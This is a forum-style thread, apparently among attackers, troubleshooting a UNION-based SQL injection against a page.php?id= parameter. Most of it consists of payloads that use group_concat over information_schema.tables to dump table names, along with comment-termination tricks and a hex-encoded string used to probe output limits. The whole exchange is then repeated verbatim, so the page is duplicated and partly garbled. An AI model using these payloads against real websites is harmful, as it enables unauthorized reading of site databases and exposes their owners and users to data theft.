Greetings good and bad injectors, Any idea why this first query prints nothing, while the next query prints dozens of 9's?
page.php?id=123 union select 1,2,group_concat(table_name) from information_schema.tables
page.php?id=123 union select 1,2,group_concat(9) from information_schema.tables
Also tried this variant but got nothing again
page.php?id=123 union select 1,2,group_concat(/*!table_name*/) from information_schema.tables
all table names concated returns a quite long string, maybe the webapp doesn't like that. try to limit the result and to remove remaining parts of the original sql query by placing comments at the end:
page.php?id=123 union select 1,2,group_concat(table_name) from information_schema.tables limit 10-- -
tried with LIMIT and commenting but still no show
if i select a 1000 char string instead of group_concat the webapp does display it, example:
$phpString = '0x'.bin2hex(str_repeat('a',1000));
page.php?id=123 union select 1,2,$phpString from information_schema.tables limit 1--
also, LIMIT makes no difference to the size of group_concat, which always returns 1 record anyway
page.php?id=123 union select 1,2,group_concat(table_name) from information_schema.tables
page.php?id=123 union select 1,2,group_concat(9) from information_schema.tables
Also tried this variant but got nothing again
page.php?id=123 union select 1,2,group_concat(/*!table_name*/) from information_schema.tables
all table names concated returns a quite long string, maybe the webapp doesn't like that. try to limit the result and to remove remaining parts of the original sql query by placing comments at the end:
page.php?id=123 union select 1,2,group_concat(table_name) from information_schema.tables limit 10-- -
tried with LIMIT and commenting but still no show
if i select a 1000 char string instead of group_concat the webapp does display it, example:
$phpString = '0x'.bin2hex(str_repeat('a',1000));
page.php?id=123 union select 1,2,$phpString from information_schema.tables limit 1--
also, LIMIT makes no difference to the size of group_concat, which always returns 1 record anyway
0 comments:
Post a Comment